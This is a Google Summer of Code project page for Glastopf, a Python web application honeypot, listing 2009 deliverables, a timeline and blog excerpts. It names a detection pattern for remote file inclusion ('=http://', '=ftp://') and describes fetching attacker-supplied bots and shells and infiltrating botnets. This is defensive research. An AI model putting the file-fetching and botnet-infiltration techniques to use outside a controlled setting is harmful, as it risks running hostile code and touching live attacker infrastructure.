GSoC Project #8 - Web Application Honeypot

Many of today's most advanced attacks now happen at the web application layer.  This solution is designed to capture information on the latest web application attacks using scalable and easy to deploy low-interaction server honeypots.

Primary Mentor: Thorsten Holz
Student: Lukas Rist
Glastopf is a minimalistic web server emulator written in Python. The honeypot tool collects information about web application-based attacks like for example remote file inclusion, SQL injection, and local file inclusion attacks. Glastopf scans the incoming request for strings like "=http://" or "=ftp://". If this matches, we try to download and analyze the file and respond as close as possible to the attacker's expectations. If we fulfill them, the attacker sends us for example a bot, shell or spreader. Those files could for example be analyzed for IRC information to infiltrate the botnet behind this kind of attacks. The collected data is stored in a MySQL database that can be browsed via a web interface.

 
Deliverables:

  • Improvement of the included files parser.
  • A central MySQL database to consolidate the collected data.
  • The central vulnerability database: The Google dork list could be automatically extended by unknown attack strings.
  • A template system for common web applications to provide a larger attack surface for the honeypot.
  • External interfaces to Glastopf such that other projects can also integrate the collected information.
  • Informing owners of compromised web pages with the information collected in the central database.
  • Project documentation in the TRAC wiki.
  • Analysis of the collected files.
  • Statistical analysis of the collected attack information.
  • Code cleanup. There are many lines to revise.

 
Timeline:
From 23.05.2009:

  • Coding start

Due 20.06.2009:

  • Central Database
  • Vulnerability Database

Due 20.07.2009:

  • Improved file parser and analysis
  • Template system
  • Statistical analysis

Due 05.08.2009:

  • Documentation
  • Code cleanup

10.08.2009:

  • Pencils down

GlastopfNG release

Before we are getting worse than Duke Nukem Forever, we decided to finally release the next generation of the web application honeypot Glastopf, aka GlastopfNG!

Glastopf's new vulnerability emulator

The number of attacks against the Webhoneypot depends strongly on his PHP parser. So keeping the pattern matching mechanism up to date was one of the major future works. One of my goals for the Google Summer of Code time is to improve the parser and to reduce upcoming changes in attack patterns. The old parser was very simple: collect all lines containing echo calls, look for known patterns and generate the appropriate response.

Improving Glastopf

Last saturday I've finally released a new Glastopf version. There are some new features and many changes under the hood.

Introducing Glastopf, a Web Application Honeypot

Hello, this initial blog post is used to introduce me and to provide a brief overview of my GSoC Project.

My name is Lukas Rist (my personal blog) and I am currently studying Math and Physics at the University of Kaiserslauter in Germany. This is my first time in GSoC and I will be working with Thorsten Holz on Glastopf, a Web Application Honeypot.

Syndicate content